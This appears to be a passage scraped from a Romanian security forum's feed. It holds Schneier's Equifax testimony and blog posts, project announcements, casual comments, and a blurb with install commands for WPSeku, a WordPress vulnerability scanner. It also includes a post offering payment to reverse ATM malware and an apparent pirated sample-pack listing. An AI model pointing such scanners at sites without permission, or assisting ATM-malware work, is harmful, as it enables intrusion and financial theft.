opt out. It will still be in those companies' databases, and will still be vulnerable. It just won't be included individually when they sell data to their customers. 5. The existing regulatory structure is inadequate. Right now, there is no way for consumers to protect themselves. Their data has been harvested and analyzed by these companies without their knowledge or consent. They cannot improve the security of their personal data, and have no control over how vulnerable it is. They only learn about data breaches when the companies announce them­ -- which can be months after the breaches occur­ -- and at that point the onus is on them to obtain credit monitoring services or credit freezes. And even those only protect consumers from some of the harms, and only those suffered after Equifax admitted to the breach. Right now, the press is reporting "dozens" of lawsuits against Equifax from shareholders, consumers, and banks. Massachusetts has sued Equifax for violating state consumer protection and privacy laws. Other states may follow suit. If any of these plaintiffs win in the court, it will be a rare victory for victims of privacy breaches against the companies that have our personal information. Current law is too narrowly focused on people who have suffered financial losses directly traceable to a specific breach. Proving this is difficult. If you are the victim of identity theft in the next month, is it because of Equifax or does the blame belong to another of the thousands of companies who have your personal data? As long as one can't prove it one way or the other, data brokers remain blameless and liability free. Additionally, much of this market in our personal data falls outside the protections of the Fair Credit Reporting Act. And in order for the Federal Trade Commission to levy a fine against Equifax, it needs to have a consent order and then a subsequent violation. Any fines will be limited to credit information, which is a small portion of the enormous amount of information these companies know about us. In reality, this is not an effective enforcement regime. Although the FTC is investigating Equifax, it is unclear if it has a viable case. 6. The market cannot fix this because we are not the customers of data brokers. The customers of these companies are people and organizations who want to buy information: banks looking to lend you money, landlords deciding whether to rent you an apartment, employers deciding whether to hire you, companies trying to figure out whether you'd be a profitable customer­ -- everyone who wants to sell you something, even governments. Markets work because buyers choose from a choice of sellers, and sellers compete for buyers. None of us are Equifax's customers. None of us are the customers of any of these data brokers. We can't refuse to do business with the companies. We can't remove our data from their databases. With few limited exceptions, we can't even see what data these companies have about us or correct any mistakes. We are the product that these companies sell to their customers: those who want to use our personal information to understand us, categorize us, make decisions about us, and persuade us. Worse, the financial markets reward bad security. Given the choice between increasing their cybersecurity budget by 5%, or saving that money and taking the chance, a rational CEO chooses to save the money. Wall Street rewards those whose balance sheets look good, not those who are secure. And if senior management gets unlucky and the a public breach happens, they end up okay. Equifax's CEO didn't get his $5.2 million severance pay, but he did keep his $18.4 million pension. Any company that spends more on security than absolutely necessary is immediately penalized by shareholders when its profits decrease. Even the negative PR that Equifax is currently suffering will fade. Unless we expect data brokers to put public interest ahead of profits, the security of this industry will never improve without government regulation. 7. We need effective regulation of data brokers. In 2014, the Federal Trade Commission recommended that Congress require data brokers be more transparent and give consumers more control over their personal information. That report contains good suggestions on how to regulate this industry. First, Congress should help plaintiffs in data breach cases by authorizing and funding empirical research on the harm individuals receive from these breaches. Specifically, Congress should move forward legislative proposals that establish a nationwide "credit freeze" -- ­which is better described as changing the default for disclosure from opt-out to opt-in -- ­and free lifetime credit monitoring services. By this I do not mean giving customers free credit-freeze options, a a href="http://money.cnn.com/2017/09/15/pf/warren-schatz-equifax/index.html">proposalby Senators Warren and Schatz, but that the default should be a credit freeze. The credit card industry routinely notifies consumers when there are suspicious charges. It is obvious that credit reporting agencies should have a similar obligation to notify consumers when there is suspicious activity concerning their credit report. On the technology side, more could be done to limit the amount of personal data companies are allowed to collect. Increasingly, privacy safeguards impose "data minimization" requirements to ensure that only the data that is actually needed is collected. On the other hand, Congress should not create a new national identifier to replace the Social Security Numbers. That would make the system of identification even more brittle. Better is to reduce dependence on systems of identification and to create contextual identification where necessary. Finally, Congress needs to give the Federal Trade Commission the authority to set minimum security standards for data brokers and to give consumers more control over their personal information. This is essential as long as consumers are these companies' products and not their customers. 8. Resist complaints from the industry that this is "too hard." The credit bureaus and data brokers, and their lobbyists and trade-association representatives, will claim that many of these measures are too hard. They're not telling you the truth. Take one example: credit freezes. This is an effective security measure that protects consumers, but the process of getting one and of temporarily unfreezing credit is made deliberately onerous by the credit bureaus. Why isn't there a smartphone app that alerts me when someone wants to access my credit rating, and lets me freeze and unfreeze my credit at the touch of the screen? Too hard? Today, you can have an app on your phone that does something similar if you try to log into a computer network, or if someone tries to use your credit card at a physical location different from where you are. Moreover, any credit bureau or data broker operating in Europe is already obligated to follow the more rigorous EU privacy laws. The EU General Data Protection Regulation will come into force, requiring even more security and privacy controls for companies collecting storing the personal data of EU citizens. Those companies have already demonstrated that they can comply with those more stringent regulations. Credit bureaus, and data brokers in general, are deliberately not implementing these 21st-century security solutions, because they want their services to be as easy and useful as possible for their actual customers: those who are buying your information. Similarly, companies that use this personal information to open accounts are not implementing more stringent security because they want their services to be as easy-to-use and convenient as possible. 9. This has foreign trade implications. The Canadian Broadcast Corporation reported that 100,000 Canadians had their data stolen in the Equifax breach. The British Broadcasting Corporation originally reported that 400,000 UK consumers were affected; Equifax has since revised that to 15.2 million. Many American Internet companies have significant numbers of European users and customers, and rely on negotiated safe harbor agreements to legally collect and store personal data of EU citizens. The European Union is in the middle of a massive regulatory shift in its privacy laws, and those agreements are coming under renewed scrutiny. Breaches such as Equifax give these European regulators a powerful argument that US privacy regulations are inadequate to protect their citizens' data, and that they should require that data to remain in Europe. This could significantly harm American Internet companies. 10. This has national security implications. Although it is still unknown who compromised the Equifax database, it could easily have been a foreign adversary that routinely attacks the servers of US companies and US federal agencies with the goal of exploiting security vulnerabilities and obtaining personal data. When the Fair Credit Reporting Act was passed in 1970, the concern was that the credit bureaus might misuse our data. That is still a concern, but the world has changed since then. Credit bureaus and data brokers have far more intimate data about all of us. And it is valuable not only to companies wanting to advertise to us, but foreign governments as well. In 2015, the Chinese breached the database of the Office of Personal Management and stole the detailed security clearance information of 21 million Americans. North Korea routinely engages in cybercrime as way to fund its other activities. In a world where foreign governments use cyber capabilities to attack US assets, requiring data brokers to limit collection of personal data, securely store the data they collect, and delete data about consumers when it is no longer needed is a matter of national security. 11. We need to do something about it. Yes, this breach is a huge black eye and a temporary stock dip for Equifax -- ­this month. Soon, another company will have suffered a massive data breach and few will remember Equifax's problem. Does anyone remember last year when Yahoo admitted that it exposed personal information of a billion users in 2013 and another half billion in 2014? Unless Congress acts to protect consumer information in the digital age, these breaches will continue. Thank you for the opportunity to testify today. I will be pleased to answer your questions. Tags: breaches, national security policy, Schneier news Posted on November 8, 2017 at 6:33 AM • 8 Comments Cybercriminals Infiltrating E-Mail Networks to Divert Large Customer Payments There's a new criminal tactic involving hacking an e-mail account of a company that handles high-value transactions and diverting payments. Here it is in real estate: The scam generally works like this: Hackers find an opening into a title company's or realty agent's email account, track upcoming home purchases scheduled for settlements -- the pricier the better -- then assume the identity of the title agency person handling the transaction. Days or sometimes weeks before the settlement, the scammer poses as the title or escrow agent whose email accounts they've hijacked and instructs the home buyer to wire the funds needed to close -- often hundreds of thousands of dollars, sometimes far more -- to the criminals' own bank accounts, not the title or escrow company's legitimate accounts. The criminals then withdraw the money and vanish. Here it is in fine art: The fraud is relatively simple. Criminals hack into an art dealer's email account and monitor incoming and outgoing correspondence. When the gallery sends a PDF invoice to a client via email following a sale, the conversation is hijacked. Posing as the gallery, hackers send a duplicate, fraudulent invoice from the same gallery email address, with an accompanying message instructing the client to disregard the first invoice and instead wire payment to the account listed in the fraudulent document. Once money has been transferred to the criminals' account, the hackers move the money to avoid detection and then disappear. The same technique is used to intercept payments made by galleries to their artists and others. Because the hackers gain access to the gallery's email contacts, the scam can spread quickly, with fraudulent emails appearing to come from known sources. I'm sure it's happening in other industries as well, probably even with business-to-business commerce. via Me on the Equifax Breach

Daphne Caruana Galizia's Murder and the Security of WhatsApp Daphne Caruana Galizia was a Maltese journalist whose anti-corruption investigations exposed powerful people. She was murdered in October by a car bomb. Galizia used WhatsApp to communicate securely with her sources. Now that she is dead, the Maltese police want to break into her phone or the app, and find out who those sources were. One journalist reports: Part of Daphne's destroyed smart phone was elevated from the scene. Investigators say that Caruana Galizia had not taken her laptop with her on that particular trip. If she had done so, the forensic experts would have found evidence on the ground. Her mobile phone is also being examined, as can be seen from her WhatsApp profile, which has registered activity since the murder. But it is understood that the data is safe. Sources close to the newsroom said that as part of the investigation her sim card has been cloned. This is done with the help of mobile service providers in similar cases. Asked if her WhatsApp messages or any other messages that were stored in her phone will be retrieved, the source said that since the messaging application is encrypted, the messages cannot be seen. Therefore it is unlikely that any data can be retrieved. I am less optimistic than that reporter. The FBI is providing "specific assistance." The article doesn't explain that, but I would not be surprised if they were helping crack the phone. It will be interesting to see if WhatsApp's security survives this. My guess is that it depends on how much of the phone was recovered from the bombed car. EDITED TO ADD (11/7): The court-appointed IT expert on the case has a criminal record in the UK for theft and forgery. via Bruce Schneier

http://www.zerohedge.com/news/2017-11-06/facebook-now-wants-your-nude-photos Partea proasta e ca nu e gluma, un labar de la Facebook nu avea material suficient si s-a gandit sa te puna sa iti trimiti de buna voie pozele nud, totul sub "lupa" guvernului Australian

Introducing Javalin Javalin is a very lightweight web framework for Kotlin and Java, inspired by Sparkjava and koa.js. Javalin is written in Kotlin with a few functional interfaces written in Java. This was necessary to provide an enjoyable and near identical experience for both Kotlin and Java developers. Java quickstart Add dependency (maven) <dependency> <groupId>io.javalin</groupId> <artifactId>javalin</artifactId> <version>1.0.0</version> </dependency> Start programming import io.javalin.Javalin; public class HelloWorld { public static void main(String[] args) { Javalin app = Javalin.start(7000); app.get("/", ctx -> ctx.result("Hello World")); } } Kotlin quickstart Add dependency (gradle) compile 'io.javalin:javalin:1.0.0' Start programming import io.javalin.Javalin fun main(args: Array<String>) { val app = Javalin.start(7000) app.get("/") { ctx -> ctx.result("Hello World") } } Special thanks: Blake Mizerany, for creating Sinatra Per Wendel, for creating Spark Christian Rasmussen, for being a great guy Per Kristian Kummermo, also for being a great guy Download: javalin-master.zip or git clone https://github.com/tipsy/javalin.git Sources: https://javalin.io/news/javalin-1.0.0-stable.html https://github.com/tipsy/javalin

WPSeku v0.2.1 - Wordpress Security Scanner WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. Installation # git clone https://github.com/m4ll0k/WPSeku.git # cd WPSeku # pip install -r requirements.txt # python wpseku.py Usage: python --target http://youtargethere.com License WPSeku is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 3 of the License. WPSeku is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with WPSeku; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. WPSeku uses WPScan Vulnerability Database API (https://wpvulndb.com/api) Download: WPSeku-master.zip or git clone https://github.com/m4ll0k/WPSeku.git Source: https://github.com/m4ll0k/WPSeku

Chalktalk is a digital presentation and communication language in development at New York University's Future Reality Lab. Using a blackboard-like interface, it allows a presenter to create and interact with animated digital sketches in order to demonstrate ideas and concepts in the context of a live presentation or conversation. Sketches can display animations and graphics in 2D and 3D… …link together to demonstrate complex logical connections and behaviors… …and even be coded live from within Chalktalk itself. A growing library of sketches--from creatures to math and physics objects--is available, and Chalktalk continues to evolve. Installation and Usage Installation instructions can be found in the wiki. More complete documentation on the usage of the system can be found there as well, but is a work in progress. Creating and Contribuiting Contributions to the core codebase and sketch library are welcome. To create your own sketch, create a new .js file (nameOfMySketch.js) or copy a template (from sketch_templates) into the sketches directory. In your file, change the value of this.label and begin customizing your new sketch. Further information on sketch creation can be found in the wiki. License MIT Download: chalktalk-master.zip or git clone https://github.com/kenperlin/chalktalk.git Source: https://github.com/kenperlin/chalktalk

Sunt diferente semnificative cand vine vorba de fotografii in coditii de lumina scazuta. DxOMark nu se adreseaza utilizatorilor incepatori, dar cu cateva cunostiinte de nivel mediu legate de o camera, poti sa intelegi cam care ar fi diferentele si pe ce sa mergi mai departe. De asemenea, multe camere frontale (inclusiv iPhone) nu sunt tocmai excelente. Din punctul meu de vedere, camera e unul dintre cele mai importante lucruri cand vine vorba de un telefon. Chiar daca pe Facebook o sa arate nasol, cel putin daca le savezi si te uiti peste ani la ele, o sa ai niste fotografii de calitate. In plus, nu mai trebuie sa cari o camera foto (compacta) ca sa faci poze decente cand calatoresti.

observi corespondenta dintre reactii si optiunea angajarii politice/"ordin de zi" a celor ce tin sa faca publica optiunea prin like/downvote/upvote/thanks ? intreb , caci postind aici pe acest topic, o vajnica constiinta civica, facuta la apelul bocancilor, apasata de epoleti, a simtit nevoia sa-mi adreseze primul PM, primit pe acest forum, "Ce pizda ma-tii imi dai - la postari ? suferi ? ".... ii voi da un raspuns pe care sigur nu-l va intelege

hello i have atm malware need to reverse it will pay contact email protonmail.com

Pentru producatori de muzica:: Content: 01. Vengeance Dance Explotion Vol.102. Vengeance Dirty Electro Vol.103. Vengeance Dirty Electro Vol.204. Vengeance Effects Vol.105. Vengeance Effects Vol.206. Vengeance Effects Vol.307. Vengeance Electro Essentials Vol.108. Vengeance Electro Essentials Vol.209. Vengeance Electroshock Vol.110. Vengeance Electroshock Vol.211. Vengeance Essential Clubsounds Vol.112. Vengeance Essential Clubsounds Vol.213. Vengeance Essential Clubsounds Vol.314. Vengeance Essential Clubsounds Vol.415. Vengeance Essential Dubstep Vol.116. Vengeance Essential House Vol.117. Vengeance Essential House Vol.218. Vengeance Essential House Vol.319. Vengeance Freakz On Beatz Vol.120. Vengeance Future House Vol.121. Vengeance Future House Vol.222. Vengeance Future House Vol.323. Vengeance Future House Vol.424. Vengeance Minimal House Vol.125. Vengeance Minimal House Vol.226. Vengeance Rhythm Guitars Vol.127. Vengeance Studio Vocals Vol.128. Vengeance Total Dance Sounds Vol.129. Vengeance Total Dance Sounds Vol.230. Vengeance Total Dance Sounds Vol.331. Vengeance Trance Sensation Vol.132. Vengeance Trance Sensation Vol.233. Vengeance Trance Sensation Vol.334. Vengeance Ultimate Bass EXS Halion.iso35. Vengeance Ultimate Fills Vol.136. Vengeance Ultimate Fills Vol.237. Vengeance Vocal Essentials Vol.138. Vengeance Vocal Essentials Vol.2